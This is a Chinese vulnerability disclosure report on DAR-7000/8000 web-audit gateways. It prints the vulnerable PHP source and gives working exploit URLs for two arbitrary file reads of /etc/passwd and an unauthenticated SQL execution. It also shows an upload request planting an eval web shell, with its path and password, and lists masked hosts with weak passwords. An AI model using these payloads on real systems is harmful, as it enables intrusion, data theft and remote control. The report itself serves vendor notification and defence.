2015-08-23: 细节已通知厂商并且等待厂商处理中 2015-08-25: 厂商已经确认,细节仅向厂商公开 2015-08-28: 细节向第三方安全合作伙伴开放 2015-10-19: 细节向核心白帽子及相关领域专家公开 2015-10-29: 细节向普通白帽子公开 2015-11-08: 细节向实习白帽子公开 2015-11-23: 细节向公众公开
Y__Y
两处任意文件遍历(需登录)一处Getshell(需登录)一处SQL命令执行(无需登录)根据案例测试发现涉及“DAR-8000 系列上网行为审计网关”和“DAR-7000 系列上网行为审计网关”两款网关。
第一处任意文件遍历(文件download.php):
<?phpinclude_once('../session.php');include_once('../global.func.php');include_once('../include/language_cn.php');include_once('inc/mail.inc.php');include_once('../include/socket.php');$file=urldecode(base64_decode($_GET["file"]));$ifother = "";if(!isset($_GET['local'])){ $ifother = ifExistOther($file); if($ifother!="") { $file = $ifother; } else { error(); exit(); }}$path_parts = pathinfo($file);if(isset($_GET['filetype'])){ if($_GET['filetype']=="SMTP"&&$path_parts['extension'] == "pcap") { $returnvalue = parser_capmail($file,"smtp"); if ($returnvalue != "139"&&$returnvalue != "0") { error(); exit(); } $rpos = strrpos($file,"."); $file = substr($file,0,$rpos).".eml"; } if($_GET['filetype']=="POP"&&$path_parts['extension'] == "cap") { $returnvalue = parser_capmail($file); if ($returnvalue != "139"&&$returnvalue != "0") { error(); exit(); } $rpos = strrpos($file,"."); $file = substr($file,0,$rpos).".eml"; $file=str_replace("pop","pma",$file); }}$get_type = $_GET['type'];if(!file_exists($file)){ $url_from = $_GET['url']; error(); exit();}switch($get_type){ case 'chat': $lines = file($file); ini_set("default_charset",'utf-8');//!!!!! $html="<html><head><meta http-equiv='Content-Type' content='text/html; charset=UTF-8' /><link href='../css/zooe.css' type='text/css' rel='stylesheet'><title>Chat content</title></head><body><br><br>"; $html.="<div align=center><b>Chat Content</b></div>"; $html.="<table align='center' style='border:1px solid #CEE3FB;' width='80%' border='0'>"; foreach ($lines as $line_num => $line) { $line_test = $line; if($line_test != ""&&$line_test != null) { $line = $line_test; } //echo $line."<br>"; //$line = iconv("UTF-8","GB2312//ignore",$line);//GBK UTF-8 GB2312//ignore $html.="<tr>"; $html.="<td>".$line."</td>"; $html.="</tr>"; /*if(preg_match_all("/^(.*?):(.*?)$/s",$line,$re)) { $html.="<tr>"; $html.="<td>".$re[1][0]."</td>"; $html.="<td>".$re[2][0]."</td>"; $html.="</tr>"; }*/ } $html.="</table>"; $html.="<br><br><div align=center><input type='button' value='close' onclick='window.close()' class='btn'></div>"; $html.="</body></html>"; echo $html; break; case 'webqq': $lines = file($file); $html="<html><head><link href='../css/zooe.css' type='text/css' rel='stylesheet'><title>Chat content</title></head><body><br><br>"; $html.="<div align=center><b>WEBQQ Content</b></div>"; $html.="<table align='center' style='border:1px solid #CEE3FB;' width='80%' border='0'>"; foreach ($lines as $line_num => $line) { $line_test = $line; if($line_test != ""&&$line_test != null) { $line = urldecode($line_test); } //echo $line."<br>"; if(strstr($line,"\u")) $line = unicode_decode($line_test); else $line = iconv("UTF-8","GB2312//ignore",$line); $html.="<tr>"; $html.="<td>".$line."</td>"; $html.="</tr>"; } $html.="</table>"; $html.="<br><br><div align=center><input type='button' value='$LANG_CLOSE' onclick='window.close()' class='btn'></div>"; $html.="</body></html>"; echo $html; break; case 'content': $time_begin = $_GET['time_begin']; $time_end = $_GET['time_end']; $arr_tab_names = getTableByTimeRange("tb_PostLog",urldecode($time_begin),urldecode($time_end)); $id=$_GET['id']; $sql = ""; for($i=0;$i<$tab_count;$i++) { $tablename = $arr_tab_names[$i]; if(!TableExists($tablename,"nsg")) continue; $sql.= "select * from ("; $sql.= "select content from ".$arr_tab_names[$i]." where id=$id"; $sql.= " ) as tmp$i "; if(($tab_count-1) != $i) $sql.= " union "; } $result=byzoro_query_error($sql); if($result) { $num=byzoro_num_rows($result); if($num>0) { $rows=byzoro_fetch_array($result); $str=$rows['content']; if(isset($_GET['keyword'])) { $keyword=$_GET['keyword']; $str=str_replace($keyword,"<b style=\"color:black;background-color:#ffff66\">".$keyword."</b>",$str); } echo htmlspecialchars($str); } } break; case 'chat_qq': $lines = file($file); $html="<html><head><link href='../css/zooe.css' type='text/css' rel='stylesheet'><title>Chat content</title></head><body><br><br>"; $html.="<div align=center><b>QQ Content</b></div>"; $html.="<table align='center' style='border:1px solid #CEE3FB;' width='80%' border='0'>"; $html.="<tr height='35px'><td> </td><td> </td></tr>"; foreach ($lines as $line_num => $line) { $line_test = $line; if($line_test != ""&&$line_test != "null") { $line = $line_test; } //echo $line."<br>"; //$line = iconv("UTF-8","GB2312",$line); $html.="<tr>"; $html.="<td width='5%'> </td>"; $html.="<td>".iconv("utf-8","GB2312//ignore",$line)."</td>"; $html.="</tr>"; /*if(preg_match_all("/^(.*?):(.*?)$/s",$line,$re)) { $html.="<tr>"; $html.="<td>".$re[1][0]."</td>"; $html.="<td>".$re[2][0]."</td>"; $html.="</tr>"; }*/ } $html.="<tr height='30px'><td> </td><td> </td></tr>"; $html.="</table>"; $html.="<br><br><div align=center><input type='button' value='$LANG_CLOSE' onclick='window.close()' class='btn'></div>"; $html.="</body></html>"; echo $html; break; case 'filedown': download($file,$_GET['filename']); break;}function download($sFilePath,$file_name){ if(file_exists($sFilePath)) { $file_size=filesize ($sFilePath); Header( "Expires: 0" ); Header( "Pragma: public" ); Header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" ); Header( "Cache-Control: public"); Header( "Content-Type: application/octet-stream" ); header("Accept-Ranges: bytes"); header("Accept-Length: $file_size"); if (strstr($_SERVER["HTTP_USER_AGENT"],"MSIE")) { Header( "Content-Disposition: attachment; filename=".$file_name ); } else { header("Content-Disposition: attachment; filename=".$file_name); } $fp = fopen($sFilePath,"r"); $buffer_size = 1024; $cur_pos = 0; while(!feof($fp)&&$file_size-$cur_pos>$buffer_size) { $buffer = fread($fp,$buffer_size); echo $buffer; $cur_pos += $buffer_size; } $buffer = fread($fp,$file_size-$cur_pos); echo $buffer; fclose($fp); return true; } else { $url_from=$_GET['url']; error(); }}function error(){ global $LANG_CONTENT_NOTOPEN,$LANG_RETURN,$LANG_BTN_CLOSE; //echo "$LANG_CONTENT_NOTOPEN<a href=\"#\" onclick=javascript:history.back(-1)>$LANG_RETURN</a> <a href=\"javascript:window.close();\">$LANG_BTN_CLOSE</a>"; echo "<script>alert('$LANG_CONTENT_NOTOPEN');history.back(-1);</script>";}?>
参数file控制不严导致。文件路径需BASE64编码,利用方式https://地址/log/download.php?type=filedown&file=Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==&filename=1.txt
第二处任意文件遍历(文件resmanage.php):
<?phpinclude_once("../session.php");include_once('../funlist.php');include_once("../global.func.php");if ($_SESSION['language'] != "english") { require_once ("../include/language_cn.php");} else { require_once ("../include/language_en.php");}//tftp -g **.**.**.** -r useratte/tpl/_resmanage.php /** * Goofy 2011-11-30 * getDir()去文件夹列表,getFile()去对应文件夹下面的文件列表,二者的区别在于判断有没有“.”后缀的文件,其他都一样 *///获取文件目录列表,该方法返回数组function getDir($dir) { $dirArray[] = NULL; if (false != ($handle = opendir($dir))) { $i = 0; while (false !== ($file = readdir($handle))) { //去掉"“.”、“..”以及带“.xxx”后缀的文件 if ($file != "." && $file != ".." && !strpos($file, ".")) { $dirArray[$i] = $file; $i++; } } //关闭句柄 closedir($handle); } return $dirArray;}//获取文件列表function getFile($dir) { $fileArray[] = NULL; if (false != ($handle = opendir($dir))) { $i = 0; while (false !== ($file = readdir($handle))) { //去掉"“.”、“..”以及带“.xxx”后缀的文件 if ($file != "." && $file != ".." && strpos($file, ".")) { //$fileArray[$i]="./imageroot/current/".$file; $fileArray[$i] = $dir . $file; if ($i == 100) { break; } $i++; } } //关闭句柄 closedir($handle); } return $fileArray;}//上传$targetdir = "/home/portal/res/";function upload($targetdir) { $filetype = substr($_FILES["file"]["type"], 0, 5); if($filetype != 'image'){ alert_only("不是图像文件,不能上传");//不是图像文件,不能上传 return false; } if(round($_FILES["file"]["size"]/1024)>1024){ alert_only("图像大于1M,不能上传");//图像大于1M,不能上传 return false; } if (is_uploaded_file($_FILES['file']['tmp_name'])) { if ($_FILES["file"]["error"] > 0) { alert_only("错误消息: " . $_FILES["file"]["error"]);//错误消息 } else { $move = move_uploaded_file($_FILES["file"]["tmp_name"], $targetdir . $_FILES["file"]["name"]); $str = "config portal \n resource file ".$targetdir . $_FILES["file"]["name"]." \n"; socket($str); alert_only('上传成功!');//上传成功 } } else { alert_only('上传失败!');//上传失败 }}if (isset($_FILES['file'])) { upload($targetdir);}//内存加载的文件数组function get_memory_file_arr(){ $str="show running-config portal\n"; $aaa=socket($str); preg_match_all("/resource file (.*?)\n/",$aaa,$matches); return $matches[1];}$memfile = get_memory_file_arr();$fileArray = getFile($targetdir);function get_sever_arr(){ $str="show running-config portal\n"; $aaa=socket($str); preg_match_all("/resource server (.*?)\n/",$aaa,$matches); return $matches[1];}$severarr = get_sever_arr();//删除if(isset($_GET['dels'])){ $dels = $_GET['dels']; $dels = explode("||", $dels); $descompelet = true; $commend ="config portal \n" ; foreach ($dels as $value){ if(!unlink($value)){ $descompelet = false; } $commend.="no resource file ".$value." \n"; } socket($commend); if($descompelet){ alert("$LANG_DEL_SUCESS!", "resmanage.php"); }else{ alert_only("$LANG_DEL_FAILD"); } die();}//下载if(isset($_GET['load'])){ $load = $_GET['load']; $load = explode("||", $load); $load = implode(" ",$load); $dirr = "/tmp/"; chdir($dirr); $commend = "tar czvf img.tar.gz ".$load; if (exec($commend,$output, $return_val)){ echo "<script>location='" . $dirr . "img.tar.gz';</script>"; }else { alert_only("$LANG_DOWNFAILE"); } die();}if(isset($_GET['regist'])){ $regist = $_GET['regist']; $regist = explode("||", $regist); $str ="config portal \n" ; foreach ($regist as $v){ $str.="resource file ".$v." \n"; } socket($str); location("resmanage.php"); die();}if(isset($_GET['saveserver'])){//保存服务器资源 $saveserver = $_GET['saveserver']; $saveserver = explode("||", $saveserver);//$severarr $arr1 = array_diff($saveserver,$severarr);//需要添加的。 $arr2 = array_diff($severarr,$saveserver);//需要删除的。 $str ="config portal \n" ; foreach ($arr2 as $v){ if (trim($v)=="") { continue; } $str.="no resource server ".trim($v)." \n"; } foreach ($arr1 as $v){ if (trim($v)=="") { continue; } $str.="resource server ".trim($v)." \n"; } $str.="exit\n"; socket($str); echo "<script>window.location.reload()</script>"; die();}if(isset($_GET['delssrc'])){//删除服务器资源 $delssrc = $_GET['delssrc']; $str ="config portal \n no resource server ".$delssrc ."\nexit\n"; socket($str); echo "<script>window.location.reload()</script>"; die();}if (isset($_GET['webpush']) && $_GET['webpush']==1) { $menustr = "当前位置:WEB推送 >> 定制推送页面 >> 资源文件管理"; } else { $menustr = "当前位置:用户认证 >> 定制WEB认证页面 >> 资源文件管理"; }require_once("tpl/_resmanage.php");
参数load控制不严导致,利用方式https://地址/useratte/resmanage.php?load=../../../../etc/passwd
以上访问会生成一个临时gz压缩文件tmp/img.tar.gz该文件无需登录可直接访问下载。
一处Getshell(与上面文件一样,同样是文件resmanage.php):
POST /useratte/resmanage.php? HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: **.**.**.**:8443/useratte/resmanage.php?webpush=1Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Content-Type: multipart/form-data; boundary=---------------------------7df257213045aAccept-Encoding: gzip, deflateHost: **.**.**.**:8443Content-Length: 1325Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=bd04e3588f8e5c447f1b4f5a826ca979-----------------------------7df257213045aContent-Disposition: form-data; name="file"; filename="test.php"Content-Type: image/pjpeg<?php @eval($_POST['pass']);?>-----------------------------7df257213045aContent-Disposition: form-data; name="type"uploados-----------------------------7df257213045a--
**.**.**.**:8443/home/portal/res/test.php 密码pass
一处无需登录下可SQL命令执行(文件importexport.php):
<?php require_once("global.func.php");require_once("include/language_cn.php");$arr_tab = array();$arr_tab['部门'] = "select id,department_name,department_desc,start_ip,end_ip from tb_department;";$arr_tab['用户'] = "select `id`,`group_id`,`user_name`,`user_ip`,`user_mac`,`desc`,`user_mobile`,`user_tel`,`user_email`,`type` as `user_type` from tb_user";if(isset($_GET['type'])) $get_type = $_GET['type'];if(isset($_GET['tab'])) $get_tab = $_GET['tab'];if(isset($_GET['sql'])) $get_sql = $_GET['sql'];if($get_type == "exportexcel") //导出excel{ exportExcel("$get_tab",$arr_tab[$get_tab]);}if($get_type == "exportexcelbysql") //导出excel bysql{ if ($get_tab=="exportweblog") //导出web认证日志 { $get_tab = $arr_export_cn["tb_WebAuthLog"]; exportWeblog("$get_tab",stripslashes(base64_decode($get_sql))); exit(); } $get_tab = $arr_export_cn[$get_tab]; exportExcel("$get_tab",stripslashes(base64_decode($get_sql)));}if($get_type == "exportexcelbystring") //导出by string{ exportExcelByString($get_tab,$get_sql);}?>
SQL语句执行前需BASE64编码。利用方式如下:
这里执行“select * from tb_operationlog ”语句为例:
https://地址/importexport.php?sql=c2VsZWN0ICogZnJvbSB0Yl9vcGVyYXRpb25sb2cg%3D%3D&tab=tb_operationlog&type=exportexcelbysql
弱口令案例:
**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-8000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-8000 系列上网行为审计网关**.**.**.**:8443/home.php DAR-8000 系列上网行为审计网关
联系厂商
危害等级:高
漏洞Rank:14
确认时间:2015-08-25 19:11
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。
暂无
